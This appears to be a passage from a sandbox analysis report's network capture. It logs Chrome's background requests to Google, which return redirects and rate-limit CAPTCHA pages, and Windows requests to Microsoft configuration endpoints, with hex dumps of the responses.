                                                                                                                  2024-04-26 19:56:01 UTC427INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e
                                                                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549709142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:00 UTC526OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-04-26 19:56:01 UTC1842INHTTP/1.1 302 Found
                                                                                                                  Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                  x-hallmonitor-challenge: CgsI0Y2wsQYQxJGVFRIEZoGY3A
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                  Permissions-Policy: unload=()
                                                                                                                  Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                  Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:01 GMT
                                                                                                                  Server: gws
                                                                                                                  Content-Length: 458
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:01 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                  Set-Cookie: NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0; expires=Sat, 26-Oct-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:01 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549707142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:01 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-04-26 19:56:02 UTC1761INHTTP/1.1 302 Found
                                                                                                                  Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                  x-hallmonitor-challenge: CgwI0o2wsQYQlZvWjgESBGaBmNw
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                  Permissions-Policy: unload=()
                                                                                                                  Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                  Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:02 GMT
                                                                                                                  Server: gws
                                                                                                                  Content-Length: 417
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:02 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                  Set-Cookie: NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo; expires=Sat, 26-Oct-2024 19:56:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:02 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549713142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:02 UTC928OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
                                                                                                                  2024-04-26 19:56:02 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:02 GMT
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: HTTP server (unknown)
                                                                                                                  Content-Length: 3186
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:02 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
                                                                                                                  2024-04-26 19:56:02 UTC1255INData Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 42 51 75 62 61 64 68 74 32
                                                                                                                  Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="BQubadht2
                                                                                                                  2024-04-26 19:56:02 UTC1032INData Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
                                                                                                                  Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.549714142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:02 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
                                                                                                                  2024-04-26 19:56:03 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:03 GMT
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: HTTP server (unknown)
                                                                                                                  Content-Length: 3114
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:03 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                  2024-04-26 19:56:03 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 48 6e 6e 66 74 30 44 61 41 53 4b 6b 55 2d 65 72 33 31 79 30 70 50 51 70 5a 6b 54 50 68 63 70 45 6d
                                                                                                                  Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Hnnft0DaASKkU-er31y0pPQpZkTPhcpEm
                                                                                                                  2024-04-26 19:56:03 UTC960INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                                  Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  6192.168.2.54971723.35.153.42443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:05 UTC185OUTGET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: cxcs.microsoft.net
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-04-26 19:56:05 UTC127INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 26
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:05 GMT
                                                                                                                  Connection: close
                                                                                                                  2024-04-26 19:56:05 UTC26INData Raw: 3c 68 74 6d 6c 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 74 6d 6c 3e
                                                                                                                  Data Ascii: <html>404 Not Found</html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.54971923.204.76.112443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:07 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-04-26 19:56:07 UTC466INHTTP/1.1 200 OK
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (chd/0758)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-eus-z1
                                                                                                                  Cache-Control: public, max-age=40058
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:07 GMT
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.54972023.204.76.112443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Range: bytes=0-2147483646
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-04-26 19:56:07 UTC530INHTTP/1.1 200 OK
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                  Cache-Control: public, max-age=40052
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:07 GMT
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2
                                                                                                                  2024-04-26 19:56:07 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
